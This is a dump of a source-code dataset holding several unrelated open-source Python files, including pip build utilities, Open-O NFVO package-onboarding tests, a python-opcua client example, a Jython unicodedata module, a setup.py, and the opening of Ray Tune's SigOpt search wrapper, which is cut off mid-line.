repo_name: stringlengths 5-100
path: stringlengths 4-375
copies: stringclasses (991 values)
size: stringlengths 4-7
content: stringlengths 666-1M
license: stringclasses (15 values)
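Each record below lists these six fields in the order given above. As a purely illustrative sketch (the JSON-lines export format, the file name, and the helper itself are assumptions, not part of this dump), rows with these fields could be read and checked like this:

import json

# Hypothetical helper: assumes the records were exported as JSON-lines,
# one object per line, carrying exactly the six columns listed above.
EXPECTED_FIELDS = ("repo_name", "path", "copies", "size", "content", "license")

def iter_records(jsonl_path):
    """Yield each record as a dict, verifying that no schema field is missing."""
    with open(jsonl_path, encoding="utf-8") as handle:
        for line_number, line in enumerate(handle, start=1):
            record = json.loads(line)
            missing = [field for field in EXPECTED_FIELDS if field not in record]
            if missing:
                raise ValueError(
                    "line %d is missing fields: %s" % (line_number, ", ".join(missing))
                )
            yield record

# Hypothetical usage: print the repository, path, and license of every record.
# for record in iter_records("code_dataset.jsonl"):
#     print(record["repo_name"], record["path"], record["license"])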
repo_name: DavidResin/aps-aalto
path: stitch/cv/lib/python3.4/site-packages/pip/utils/build.py
copies: 899
size: 1312
content:
from __future__ import absolute_import

import os.path
import tempfile

from pip.utils import rmtree


class BuildDirectory(object):

    def __init__(self, name=None, delete=None):
        # If we were not given an explicit directory, and we were not given an
        # explicit delete option, then we'll default to deleting.
        if name is None and delete is None:
            delete = True

        if name is None:
            # We realpath here because some systems have their default tmpdir
            # symlinked to another directory. This tends to confuse build
            # scripts, so we canonicalize the path by traversing potential
            # symlinks here.
            name = os.path.realpath(tempfile.mkdtemp(prefix="pip-build-"))

            # If we were not given an explicit directory, and we were not given
            # an explicit delete option, then we'll default to deleting.
            if delete is None:
                delete = True

        self.name = name
        self.delete = delete

    def __repr__(self):
        return "<{} {!r}>".format(self.__class__.__name__, self.name)

    def __enter__(self):
        return self.name

    def __exit__(self, exc, value, tb):
        self.cleanup()

    def cleanup(self):
        if self.delete:
            rmtree(self.name)
license: gpl-3.0
repo_name: open-o/nfvo
path: lcm/lcm/packages/tests/test_nf.py
copies: 1
size: 23203
content:
# Copyright 2016-2017 ZTE Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import mock from rest_framework import status from django.test import TestCase from django.test import Client from lcm.pub.utils import restcall from lcm.pub.utils import fileutil from lcm.pub.nfvi.vim.vimadaptor import VimAdaptor from lcm.pub.database.models import NfPackageModel, VnfPackageFileModel, NfInstModel from lcm.pub.database.models import JobStatusModel, JobModel from lcm.packages.nf_package import NfOnBoardingThread, NfPkgDeletePendingThread from lcm.packages.nf_package import NfPkgDeleteThread from lcm.packages import nf_package from lcm.pub.nfvi.vim.const import VIM_OPENSTACK class TestNfPackage(TestCase): def setUp(self): self.client = Client() NfPackageModel.objects.filter().delete() VnfPackageFileModel.objects.filter().delete() NfInstModel.objects.filter().delete() JobModel.objects.filter().delete() JobStatusModel.objects.filter().delete() self.vnfd_raw_data = { "rawData":{ "instance":{ "metadata":{ "is_shared":False, "plugin_info":"vbrasplugin_1.0", "vendor":"zte", "request_reclassification":False, "name":"vbras", "version":1, "vnf_type":"vbras", "cross_dc":False, "vnfd_version":"1.0.0", "id":"zte_vbras_1.0", "nsh_aware":True }, "nodes":[ { "id":"aaa_dnet_cp_0xu2j5sbigxc8h1ega3if0ld1", "type_name":"tosca.nodes.nfv.ext.zte.CP", "template_name":"aaa_dnet_cp", "properties":{ "bandwidth":{ "type_name":"integer", "value":0 }, "direction":{ "type_name":"string", "value":"bidirectional" }, "vnic_type":{ "type_name":"string", "value":"normal" }, "sfc_encapsulation":{ "type_name":"string", "value":"mac" }, "order":{ "type_name":"integer", "value":2 } }, "relationships":[ { "name":"guest_os", "source_requirement_index":0, "target_node_id":"AAA_image_d8aseebr120nbm7bo1ohkj194", "target_capability_name":"feature" } ] }, { "id":"LB_Image_oj5l2ay8l2g6vcq6fsswzduha", "type_name":"tosca.nodes.nfv.ext.ImageFile", "template_name":"LB_Image", "properties":{ "disk_format":{ "type_name":"string", "value":"qcow2" }, "file_url":{ "type_name":"string", "value":"/SoftwareImages/image-lb" }, "name":{ "type_name":"string", "value":"image-lb" } } } ] }, "model":{ "metadata":{ "is_shared":False, "plugin_info":"vbrasplugin_1.0", "vendor":"zte", "request_reclassification":False, "name":"vbras", "version":1, "vnf_type":"vbras", "cross_dc":False, "vnfd_version":"1.0.0", "id":"zte_vbras_1.0", "nsh_aware":True }, "node_templates":[ { "name":"aaa_dnet_cp", "type_name":"tosca.nodes.nfv.ext.zte.CP", "default_instances":1, "min_instances":0, "properties":{ "bandwidth":{ "type_name":"integer", "value":0 } }, "requirement_templates":[ { "name":"virtualbinding", "target_node_template_name":"AAA", "target_capability_name":"virtualbinding" } ] } ] } } } def tearDown(self): pass def assert_job_result(self, job_id, job_progress, job_detail): jobs = JobStatusModel.objects.filter( jobid=job_id, progress=job_progress, descp=job_detail) self.assertEqual(1, len(jobs)) @mock.patch.object(NfOnBoardingThread, 'run') def 
test_nf_pkg_on_boarding_normal(self, mock_run): resp = self.client.post("/openoapi/nslcm/v1/vnfpackage", { "csarId": "1", "vimIds": ["1"] }, format='json') self.assertEqual(resp.status_code, status.HTTP_202_ACCEPTED) @mock.patch.object(restcall, 'call_req') def test_nf_pkg_on_boarding_when_on_boarded(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({"onBoardState": "onBoarded"}), '200'] NfOnBoardingThread(csar_id="1", vim_ids=["1"], lab_vim_id="", job_id="2").run() self.assert_job_result("2", 255, "CSAR(1) already onBoarded.") @mock.patch.object(restcall, 'call_req') def test_nf_pkg_on_boarding_when_on_boarding(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "onBoardState": "non-onBoarded", "processState": "onBoarding" }), '200'] NfOnBoardingThread(csar_id="2", vim_ids=["1"], lab_vim_id="", job_id="3").run() self.assert_job_result("3", 255, "CSAR(2) is onBoarding now.") @mock.patch.object(restcall, 'call_req') def test_nf_on_boarding_when_nfd_already_exists(self, mock_call_req): mock_vals = { "/openoapi/catalog/v1/csars/2": [0, json.JSONEncoder().encode({ "onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200']} def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfPackageModel(uuid="1", nfpackageid="2", vnfdid="zte_vbras_1.0").save() NfOnBoardingThread(csar_id="2", vim_ids=["1"], lab_vim_id="", job_id="4").run() self.assert_job_result("4", 255, "NFD(zte_vbras_1.0) already exists.") @mock.patch.object(restcall, 'call_req') @mock.patch.object(fileutil, 'download_file_from_http') @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'create_image') @mock.patch.object(VimAdaptor, 'get_image') def test_nf_on_boarding_when_successfully(self, mock_get_image, mock_create_image, mock__init__, mock_download_file_from_http, mock_call_req): mock_download_file_from_http.return_value = True, "/root/package" mock_vals = { "/openoapi/catalog/v1/csars/2": [0, json.JSONEncoder().encode({ "onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200'], "/openoapi/catalog/v1/csars/2/files?relativePath=/SoftwareImages/image-lb": [0, json.JSONEncoder().encode({ "csar_file_info": [{"downloadUri": "8"}, {"localPath": "9"}]}), '200'], "/openoapi/extsys/v1/vims": [0, json.JSONEncoder().encode([{ "vimId": "1", "type": VIM_OPENSTACK, "url": "/root/package", "userName": "tom", "password": "tom", "tenant": "10"}]), '200'], "/openoapi/catalog/v1/csars/2?onBoardState=onBoarded": [0, '{}', 200], "/openoapi/catalog/v1/csars/2?operationalState=Enabled": [0, '{}', 200], "/openoapi/catalog/v1/csars/2?processState=normal": [0, '{}', 200]} mock_create_image.return_value = [0, {"id": "30", "name": "jerry", "res_type": 0}] mock__init__.return_value = None mock_get_image.return_value = [0, {"id": "30", "name": "jerry", "size": "60", "status": "active"}] def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfOnBoardingThread(csar_id="2", vim_ids=["1"], lab_vim_id="", job_id="4").run() self.assert_job_result("4", 100, "CSAR(2) onBoarding successfully.") @mock.patch.object(restcall, 'call_req') @mock.patch.object(fileutil, 'download_file_from_http') @mock.patch.object(VimAdaptor, '__init__') 
@mock.patch.object(VimAdaptor, 'create_image') @mock.patch.object(VimAdaptor, 'get_image') def test_nf_on_boarding_when_timeout(self, mock_get_image, mock_create_image, mock__init__, mock_download_file_from_http, mock_call_req): nf_package.MAX_RETRY_TIMES = 2 nf_package.SLEEP_INTERVAL_SECONDS = 1 mock_download_file_from_http.return_value = True, "/root/package" mock_vals = { "/openoapi/catalog/v1/csars/3": [0, json.JSONEncoder().encode({"onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200'], "/openoapi/catalog/v1/csars/3/files?relativePath=/SoftwareImages/image-lb": [0, json.JSONEncoder().encode({ "csar_file_info": [{"downloadUri": "8"}, {"localPath": "9"}]}), '200'], "/openoapi/catalog/v1/csars/3?processState=onBoardFailed": [0, '{}', 200], "/openoapi/extsys/v1/vims": [0, json.JSONEncoder().encode([{ "vimId": "1", "type": VIM_OPENSTACK, "url": "/root/package", "userName": "tom", "password": "tom", "tenant": "10"}]), 200]} mock_create_image.return_value = [0, {"id": "30", "name": "jerry", "res_type": 0}] mock__init__.return_value = None mock_get_image.return_value = [0, {"id": "30", "name": "jerry", "size": "60", "status": "0"}] def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfOnBoardingThread(csar_id="3", vim_ids=["1"], lab_vim_id="", job_id="6").run() self.assert_job_result("6", 255, "Failed to create image:timeout(2 seconds.)") @mock.patch.object(restcall, 'call_req') @mock.patch.object(fileutil, 'download_file_from_http') @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'create_image') def test_nf_on_boarding_when_failed_to_create_image(self, mock_create_image, mock__init__, mock_download_file_from_http, mock_call_req): mock_download_file_from_http.return_value = True, "/root/package" mock_vals = { "/openoapi/catalog/v1/csars/5": [0, json.JSONEncoder().encode({ "onBoardState": "onBoardFailed", "processState": "deleteFailed"}), '200'], "/openoapi/catalog/v1/servicetemplates/queryingrawdata": [0, json.JSONEncoder().encode(self.vnfd_raw_data), '200'], "/openoapi/catalog/v1/csars/5/files?relativePath=/SoftwareImages/image-lb": [0, json.JSONEncoder().encode({ "csar_file_info": [{"downloadUri": "8"}, {"localPath": "9"}]}), '200'], "/openoapi/catalog/v1/csars/5?processState=onBoardFailed": [0, '{}', 200], "/openoapi/extsys/v1/vims": [0, json.JSONEncoder().encode([{ "vimId": "1", "type": VIM_OPENSTACK, "url": "/root/package", "userName": "tom", "password": "tom", "tenant": "10"}]), '200']} mock_create_image.return_value = [1, 'Unsupported image format.'] mock__init__.return_value = None def side_effect(*args): return mock_vals[args[4]] mock_call_req.side_effect = side_effect NfOnBoardingThread(csar_id="5", vim_ids=["1"], lab_vim_id="", job_id="8").run() self.assert_job_result("8", 255, "Failed to create image:Unsupported image format.") ######################################################################### @mock.patch.object(restcall, 'call_req') def test_get_csar_successfully(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "name": "1", "provider": "2", "version": "3", "operationalState": "4", "usageState": "5", "onBoardState": "6", "processState": "7", "deletionPending": "8", "downloadUri": "9", "createTime": "10", "modifyTime": "11", "format": "12", "size": "13" }), '200'] NfPackageModel(uuid="1", vnfdid="001", vendor="vendor", vnfdversion="1.2.0", 
vnfversion="1.1.0", nfpackageid="13").save() VnfPackageFileModel(id="1", filename="filename", imageid="00001", vimid="1", vimuser="001", tenant="12", status="1", vnfpid="13").save() NfInstModel(nfinstid="1", mnfinstid="001", nf_name="name", package_id="13").save() resp = self.client.get("/openoapi/nslcm/v1/vnfpackage/13") self.assertEqual(resp.status_code, status.HTTP_200_OK) expect_data = { "csarId": '13', "packageInfo": { "vnfdId": "001", "vnfdProvider": "vendor", "vnfdVersion": "1.2.0", "vnfVersion": "1.1.0", "name": "1", "provider": "2", "version": "3", "operationalState": "4", "usageState": "5", "onBoardState": "6", "processState": "7", "deletionPending": "8", "downloadUri": "9", "createTime": "10", "modifyTime": "11", "format": "12", "size": "13"}, "imageInfo": [{ "index": "0", "fileName": "filename", "imageId": "00001", "vimId": "1", "vimUser": "001", "tenant": "12", "status": "1"}], "vnfInstanceInfo": [{ "vnfInstanceId": "1", "vnfInstanceName": "name"}]} self.assertEqual(expect_data, resp.data) ######################################################################### @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_successfully(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "processState": "deleting"}), "200"] NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "Delete pending CSAR(1) successfully.") @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_deleting(self, mock_call_req): NfPackageModel(uuid="01", nfpackageid="1").save() mock_call_req.return_value = [0, json.JSONEncoder().encode({ "processState": "deleting"}), "200"] NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "CSAR(1) is deleting now.") @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_not_deletion_pending(self, mock_call_req): NfPackageModel(uuid="01", nfpackageid="1").save() mock_call_req.return_value = [0, json.JSONEncoder().encode({ "deletionPending": "false"}), "200"] NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "CSAR(1) need not to be deleted.") @mock.patch.object(restcall, 'call_req') def test_delete_pending_csar_when_in_using(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({ "processState": "normal"}), "200"] NfPackageModel(uuid="01", nfpackageid="1").save() NfInstModel(nfinstid="01", package_id="1").save() NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "CSAR(1) is in using, cannot be deleted.") @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'delete_image') @mock.patch.object(restcall, 'call_req') def test_delete_csarr_when_exception(self, mock_call_req, mock_delete_image, mock_init_): mock_vals = { ("/openoapi/catalog/v1/csars/1", "DELETE"): [1, "{}", "400"], ("/openoapi/catalog/v1/csars/1?processState=deleting", "PUT"): [0, "{}", "200"], ("/openoapi/catalog/v1/csars/1?processState=deleteFailed", "PUT"): [0, "{}", "200"], ("/openoapi/catalog/v1/csars/1", "GET"): [0, json.JSONEncoder().encode({"processState": "normal"}), "200"], ("/openoapi/extsys/v1/vims", "GET"): [0, json.JSONEncoder().encode([{"vimId": "002", "url": "url_test", "userName": "test01", "password": "123456", "tenant": "test"}]), "200"]} mock_delete_image.return_value = [0, "", '200'] def side_effect(*args): return mock_vals[(args[4], args[5])] mock_call_req.side_effect = side_effect mock_init_.return_value = None 
VnfPackageFileModel(vnfpid="1", imageid="001", vimid="002").save() NfPackageModel(uuid="01", nfpackageid="1").save() NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 255, "Failed to delete CSAR(1) from catalog.") @mock.patch.object(VimAdaptor, '__init__') @mock.patch.object(VimAdaptor, 'delete_image') @mock.patch.object(restcall, 'call_req') def test_delete_csar_when_successfully(self, mock_call_req, mock_delete_image, mock_init_): mock_vals = { ("/openoapi/catalog/v1/csars/1", "DELETE"): [0, json.JSONEncoder().encode({"successfully": "successfully"}), "200"], ("/openoapi/catalog/v1/csars/1?processState=deleting", "PUT"): [0, json.JSONEncoder().encode({"successfully": "successfully"}), "200"], ("/openoapi/catalog/v1/csars/1?processState=deleteFailed", "PUT"): [0, json.JSONEncoder().encode({"successfully": "successfully"}), "200"], ("/openoapi/catalog/v1/csars/1", "GET"): [0, json.JSONEncoder().encode({"notProcessState": "notProcessState"}), "200"], ("/openoapi/extsys/v1/vims", "GET"): [0, json.JSONEncoder().encode([{ "vimId": "002", "url": "url_test", "userName": "test01", "password": "123456", "tenant": "test"}]), "200"]} mock_delete_image.return_value = [0, json.JSONEncoder().encode({"test": "test"}), '200'] def side_effect(*args): return mock_vals[(args[4], args[5])] mock_call_req.side_effect = side_effect mock_init_.return_value = None VnfPackageFileModel(vnfpid="1", imageid="001", vimid="002").save() NfPackageModel(uuid="01", nfpackageid="1").save() NfPkgDeletePendingThread(csar_id="1", job_id='2').run() self.assert_job_result("2", 100, "Delete CSAR(1) successfully.") ######################################################################### @mock.patch.object(restcall, 'call_req') def test_delete_nf_pkg_when_deleting(self, mock_call_req): mock_call_req.return_value = [0, json.JSONEncoder().encode({"processState": "deleting"}), '200'] NfPkgDeleteThread(csar_id="1", job_id="2").run() self.assert_job_result("2", 100, "CSAR(1) is deleting now.") def test_get_nf_csars_normal(self): NfPackageModel(uuid="01", nfpackageid="1", vnfdid="2").save() resp = self.client.get("/openoapi/nslcm/v1/vnfpackage") self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(1, len(resp.data["csars"])) self.assertEqual("1", resp.data["csars"][0]["csarId"]) self.assertEqual("2", resp.data["csars"][0]["vnfdId"])
license: apache-2.0
repo_name: emilk/sproxel
path: distro/common/lib/ctypes/macholib/dylib.py
copies: 59
size: 2107
content:
######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
"""
Generic dylib path manipulation
"""

import re

__all__ = ['dylib_info']

DYLIB_RE = re.compile(r"""(?x)
(?P<location>^.*)(?:^|/)
(?P<name>
    (?P<shortname>\w+?)
    (?:\.(?P<version>[^._]+))?
    (?:_(?P<suffix>[^._]+))?
    \.dylib$
)
""")


def dylib_info(filename):
    """
    A dylib name can take one of the following four forms:
        Location/Name.SomeVersion_Suffix.dylib
        Location/Name.SomeVersion.dylib
        Location/Name_Suffix.dylib
        Location/Name.dylib

    returns None if not found or a mapping equivalent to:
        dict(
            location='Location',
            name='Name.SomeVersion_Suffix.dylib',
            shortname='Name',
            version='SomeVersion',
            suffix='Suffix',
        )

    Note that SomeVersion and Suffix are optional and may be None
    if not present.
    """
    is_dylib = DYLIB_RE.match(filename)
    if not is_dylib:
        return None
    return is_dylib.groupdict()


def test_dylib_info():
    def d(location=None, name=None, shortname=None, version=None, suffix=None):
        return dict(
            location=location,
            name=name,
            shortname=shortname,
            version=version,
            suffix=suffix
        )
    assert dylib_info('completely/invalid') is None
    assert dylib_info('completely/invalide_debug') is None
    assert dylib_info('P/Foo.dylib') == d('P', 'Foo.dylib', 'Foo')
    assert dylib_info('P/Foo_debug.dylib') == d('P', 'Foo_debug.dylib', 'Foo', suffix='debug')
    assert dylib_info('P/Foo.A.dylib') == d('P', 'Foo.A.dylib', 'Foo', 'A')
    assert dylib_info('P/Foo_debug.A.dylib') == d('P', 'Foo_debug.A.dylib', 'Foo_debug', 'A')
    assert dylib_info('P/Foo.A_debug.dylib') == d('P', 'Foo.A_debug.dylib', 'Foo', 'A', 'debug')


if __name__ == '__main__':
    test_dylib_info()
license: bsd-3-clause
repo_name: bitkeeper/python-opcua
path: examples/client_to_kepware.py
copies: 1
size: 1723
content:
import sys
sys.path.insert(0, "..")
import logging

from opcua import Client
from opcua import uaprotocol as ua


class SubHandler(object):

    """
    Client to subscription. It will receive events from server
    """

    def datachange_notification(self, node, val, data):
        print("Python: New data change event", node, val)

    def event_notification(self, event):
        print("Python: New event", event)


if __name__ == "__main__":
    #from IPython import embed
    logging.basicConfig(level=logging.WARN)
    client = Client("opc.tcp://192.168.56.100:49320/OPCUA/SimulationServer/")
    #client = Client("opc.tcp://192.168.56.100:4840/OPCUA/SimulationServer/")
    #client = Client("opc.tcp://olivier:olivierpass@localhost:53530/OPCUA/SimulationServer/")
    try:
        client.connect()
        root = client.get_root_node()
        print("Root is", root)
        print("childs of root are: ", root.get_children())
        print("name of root is", root.get_browse_name())
        objects = client.get_objects_node()
        print("childs og objects are: ", objects.get_children())

        tag1 = client.get_node("ns=2;s=Channel1.Device1.Tag1")
        print("tag1 is: {0} with value {1} ".format(tag1, tag1.get_value()))
        tag2 = client.get_node("ns=2;s=Channel1.Device1.Tag2")
        print("tag2 is: {0} with value {1} ".format(tag2, tag2.get_value()))

        handler = SubHandler()
        sub = client.create_subscription(500, handler)
        handle = sub.subscribe_data_change(tag1)
        handle = sub.subscribe_data_change(tag2)

        from IPython import embed
        embed()

        sub.unsubscribe(handle)
        sub.delete()
    finally:
        client.disconnect()
license: lgpl-3.0
repo_name: clumsy/intellij-community
path: python/lib/Lib/unicodedata.py
copies: 69
size: 6437
content:
from bisect import bisect_left import operator import java.lang.Character # XXX - this is intended as a stopgap measure until 2.5.1, which will have a Java implementation # requires java 6 for `normalize` function # only has one version of the database # does not normalized ideographs _codepoints = {} _eaw = {} _names = {} _segments = [] _eaw_segments = [] Nonesuch = object() def get_int(col): try: return int(col) except ValueError: return None def get_yn(col): if col == 'Y': return 1 else: return 0 def get_numeric(col): try: return float(col) except ValueError: try: a, b = col.split('/') return float(a)/float(b) except: return None def init_unicodedata(data): for row in data: cols = row.split(';') codepoint = int(cols[0], 16) name = cols[1] if name == '<CJK Ideograph, Last>': lookup_name = 'CJK UNIFIED IDEOGRAPH' else: lookup_name = name data = ( cols[2], get_int(cols[3]), cols[4], cols[5], get_int(cols[6]), get_int(cols[7]), get_numeric(cols[8]), get_yn(cols[9]), lookup_name, ) if name.find('First') >= 0: start = codepoint elif name.find('Last') >= 0: _segments.append((start, (start, codepoint), data)) else: _names[name] = unichr(codepoint) _codepoints[codepoint] = data def init_east_asian_width(data): for row in data: if row.startswith('#'): continue row = row.partition('#')[0] cols = row.split(';') if len(cols) < 2: continue cr = cols[0].split('..') width = cols[1].rstrip() if len(cr) == 1: codepoint = int(cr[0], 16) _eaw[codepoint] = width else: start = int(cr[0], 16) end = int(cr[1], 16) _eaw_segments.append((start, (start, end), width)) # xxx - need to normalize the segments, so # <CJK Ideograph, Last> ==> CJK UNIFIED IDEOGRAPH; # may need to do some sort of analysis against CPython for the normalization! def name(unichr, default=None): codepoint = get_codepoint(unichr, "name") v = _codepoints.get(codepoint, None) if v is None: v = check_segments(codepoint, _segments) if v is not None: return "%s-%X" % (v[8], codepoint) if v is None: if default is not Nonesuch: return default raise ValueError() return v[8] # xxx - also need to add logic here so that if it's CJK UNIFIED # IDEOGRAPH-8000, we go against the segment to verify the prefix def lookup(name): return _names[name] def check_segments(codepoint, segments): i = bisect_left(segments, (codepoint,)) if i < len(segments): segment = segments[i - 1] if codepoint <= segment[1][1]: return segment[2] return None def get_codepoint(unichr, fn=None): if not(isinstance(unichr, unicode)): raise TypeError(fn, "() argument 1 must be unicode, not " + type(unichr)) if len(unichr) > 1 or len(unichr) == 0: raise TypeError("need a single Unicode character as parameter") return ord(unichr) def get_eaw(unichr, default, fn): codepoint = get_codepoint(unichr, fn) v = _eaw.get(codepoint, None) if v is None: v = check_segments(codepoint, _eaw_segments) if v is None: if default is not Nonesuch: return default raise ValueError() return v def get(unichr, default, fn, getter): codepoint = get_codepoint(unichr, fn) data = _codepoints.get(codepoint, None) if data is None: data = check_segments(codepoint, _segments) if data is None: if default is not Nonesuch: return default raise ValueError() v = getter(data) if v is None: if default is not Nonesuch: return default raise ValueError() else: return v category_getter = operator.itemgetter(0) combining_getter = operator.itemgetter(1) bidirectional_getter = operator.itemgetter(2) decomposition_getter = operator.itemgetter(3) decimal_getter = operator.itemgetter(4) digit_getter = operator.itemgetter(5) numeric_getter 
= operator.itemgetter(6) mirrored_getter = operator.itemgetter(7) def decimal(unichr, default=Nonesuch): return get(unichr, default, 'decimal', decimal_getter) def decomposition(unichr, default=''): return get(unichr, default, 'decomposition', decomposition_getter) def digit(unichr, default=Nonesuch): return get(unichr, default, 'digit', digit_getter) def numeric(unichr, default=Nonesuch): return get(unichr, default, 'numeric', numeric_getter) def category(unichr): return get(unichr, 'Cn', 'catgegory', category_getter) def bidirectional(unichr): return get(unichr, '', 'bidirectional', bidirectional_getter) def combining(unichr): return get(unichr, 0, 'combining', combining_getter) def mirrored(unichr): return get(unichr, 0, 'mirrored', mirrored_getter) def east_asian_width(unichr): return get_eaw(unichr, 'N', 'east_asian_width') def jymirrored(unichr): return java.lang.Character.isMirrored(get_codepoint(unichr, 'mirrored')) try: from java.text import Normalizer _forms = { 'NFC': Normalizer.Form.NFC, 'NFKC': Normalizer.Form.NFKC, 'NFD': Normalizer.Form.NFD, 'NFKD': Normalizer.Form.NFKD } def normalize(form, unistr): """ Return the normal form 'form' for the Unicode string unistr. Valid values for form are 'NFC', 'NFKC', 'NFD', and 'NFKD'. """ try: normalizer_form = _forms[form] except KeyError: raise ValueError('invalid normalization form') return Normalizer.normalize(unistr, normalizer_form) except ImportError: pass def init(): import pkgutil import os.path import StringIO import sys my_path = os.path.dirname(__file__) loader = pkgutil.get_loader('unicodedata') init_unicodedata(StringIO.StringIO(loader.get_data(os.path.join(my_path, 'UnicodeData.txt')))) init_east_asian_width(StringIO.StringIO(loader.get_data(os.path.join(my_path, 'EastAsianWidth.txt')))) init()
license: apache-2.0
repo_name: EDRN/CancerDataExpo
path: src/edrn.rdf/setup.py
copies: 2
size: 2657
content:
# encoding: utf-8
# Copyright 2008-2011 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.

from setuptools import setup, find_packages
import os.path

# Package data
# ------------

_name = 'edrn.rdf'
_version = '1.3.8'
_description = 'EDRN RDF Server'
_author = 'Sean Kelly'
_authorEmail = '[email protected]'
_maintainer = 'Sean Kelly'
_maintainerEmail = '[email protected]'
_license = 'ALv2'
_namespaces = ['edrn']
_zipSafe = False
_keywords = 'rdf web zope plone cancer bioinformatics detection informatics edrn'
_testSuite = 'edrn.rdf.tests.test_suite'
_entryPoints = {
    'z3c.autoinclude.plugin': ['target=plone'],
}
_requirements = [
    'collective.autopermission',
    'pysolr',
    'Pillow',
    'plone.app.dexterity[relations]',
    'plone.app.relationfield',
    'plone.behavior',
    'Products.CMFPlone',
    'rdflib==4.2.2',
    'setuptools',
    'z3c.relationfield',
    'suds2',
    'zope.app.intid',
]
_extras = {
    'test': ['plone.app.testing', 'rdfextras'],
}
_classifiers = [
    'Development Status :: 4 - Beta',
    'Environment :: Web Environment',
    'Framework :: Plone',
    'Intended Audience :: Healthcare Industry',
    'Intended Audience :: Science/Research',
    'License :: OSI Approved :: Apache Software License',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Topic :: Internet :: WWW/HTTP',
    'Topic :: Scientific/Engineering :: Bio-Informatics',
    'Topic :: Software Development :: Libraries :: Python Modules',
]

# Setup Metadata
# --------------

def _read(*rnames):
    return open(os.path.join(os.path.dirname(__file__), *rnames)).read()

_header = '*' * len(_name) + '\n' + _name + '\n' + '*' * len(_name)
_longDescription = _header + '\n\n' + _read('README.rst') + '\n\n' + _read('docs', 'INSTALL.txt') + '\n\n' \
    + _read('docs', 'HISTORY.txt') + '\n'
open('doc.txt', 'w').write(_longDescription)

setup(
    author=_author,
    author_email=_authorEmail,
    classifiers=_classifiers,
    description=_description,
    entry_points=_entryPoints,
    extras_require=_extras,
    include_package_data=True,
    install_requires=_requirements,
    keywords=_keywords,
    license=_license,
    long_description=_longDescription,
    maintainer=_maintainer,
    maintainer_email=_maintainerEmail,
    name=_name,
    namespace_packages=_namespaces,
    packages=find_packages(exclude=['ez_setup', 'distribute_setup', 'bootstrap']),
    url='https://github.com/EDRN/' + _name,
    version=_version,
    zip_safe=_zipSafe,
)
license: apache-2.0
repo_name: stephanie-wang/ray
path: python/ray/tune/suggest/sigopt.py
copies: 1
size: 5550
content:
import copy import os import logging import pickle try: import sigopt as sgo except ImportError: sgo = None from ray.tune.suggest.suggestion import SuggestionAlgorithm logger = logging.getLogger(__name__) class SigOptSearch(SuggestionAlgorithm): """A wrapper around SigOpt to provide trial suggestions. Requires SigOpt to be installed. Requires user to store their SigOpt API key locally as an environment variable at `SIGOPT_KEY`. Parameters: space (list of dict): SigOpt configuration. Parameters will be sampled from this configuration and will be used to override parameters generated in the variant generation process. name (str): Name of experiment. Required by SigOpt. max_concurrent (int): Number of maximum concurrent trials supported based on the user's SigOpt plan. Defaults to 1. metric (str): The training result objective value attribute. mode (str): One of {min, max}. Determines whether objective is minimizing or maximizing the metric attribute. Example: >>> space = [ >>> { >>> 'name': 'width', >>> 'type': 'int', >>> 'bounds': { >>> 'min': 0, >>> 'max': 20 >>> }, >>> }, >>> { >>> 'name': 'height', >>> 'type': 'int', >>> 'bounds': { >>> 'min': -100, >>> 'max': 100 >>> }, >>> }, >>> ] >>> algo = SigOptSearch( >>> space, name="SigOpt Example Experiment", >>> max_concurrent=1, metric="mean_loss", mode="min") """ def __init__(self, space, name="Default Tune Experiment", max_concurrent=1, reward_attr=None, metric="episode_reward_mean", mode="max", **kwargs): assert sgo is not None, "SigOpt must be installed!" assert type(max_concurrent) is int and max_concurrent > 0 assert "SIGOPT_KEY" in os.environ, \ "SigOpt API key must be stored as environ variable at SIGOPT_KEY" assert mode in ["min", "max"], "`mode` must be 'min' or 'max'!" if reward_attr is not None: mode = "max" metric = reward_attr logger.warning( "`reward_attr` is deprecated and will be removed in a future " "version of Tune. " "Setting `metric={}` and `mode=max`.".format(reward_attr)) if "use_early_stopped_trials" in kwargs: logger.warning( "`use_early_stopped_trials` is not used in SigOptSearch.") self._max_concurrent = max_concurrent self._metric = metric if 